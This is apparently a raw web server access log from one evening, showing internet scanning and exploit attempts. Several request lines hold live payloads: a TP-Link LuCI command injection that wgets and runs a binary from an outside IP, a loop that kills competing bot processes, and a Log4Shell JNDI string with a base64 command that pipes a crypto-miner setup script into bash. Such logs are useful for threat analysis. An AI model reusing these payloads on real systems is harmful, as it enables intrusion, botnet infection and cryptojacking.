[30/Jun/2024:21:20:29 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.224.128.63 - - [30/Jun/2024:21:28:20 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [30/Jun/2024:21:28:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.63 - - [30/Jun/2024:21:28:20 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [30/Jun/2024:21:28:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [30/Jun/2024:22:02:02 +0200] "GET / HTTP/1.1" 200 1895 164.90.174.121 - - [30/Jun/2024:22:10:52 +0200] "-" 400 1930 164.90.174.121 - - [30/Jun/2024:22:12:07 +0200] "GET /hello HTTP/1.1" 404 723 87.121.69.27 - - [30/Jun/2024:22:24:43 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 147.185.132.106 - - [30/Jun/2024:22:39:04 +0200] "-" 400 1930 147.185.132.106 - - [30/Jun/2024:22:39:04 +0200] "-" 400 1930 45.148.10.174 - - [30/Jun/2024:22:49:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [30/Jun/2024:22:49:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 141.98.83.197 - - [30/Jun/2024:23:07:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [30/Jun/2024:23:07:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 95.214.55.144 - - [30/Jun/2024:23:16:21 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//95.214.55.202:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vNFRoZVBvb2wveG1yaWdfc2V0dXAvbWFpbi9zZXR1cF80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ5OWE2TE12YW1XY3Vxblc3d21NaDVpZkwxVlN6OWMzWVFwMlBjYkFERlA0YXI2YWQ1ZXZQVlJld0JmRnFISFBOWFc0b3JWZUFVMXJhVXpNZVZmQlFaM3RUcDhLWkxK%7D%27) HTTP/1.1" 404 1173 149.50.103.48 - - [30/Jun/2024:23:35:46 +0200] "GET / HTTP/1.1" 200 1895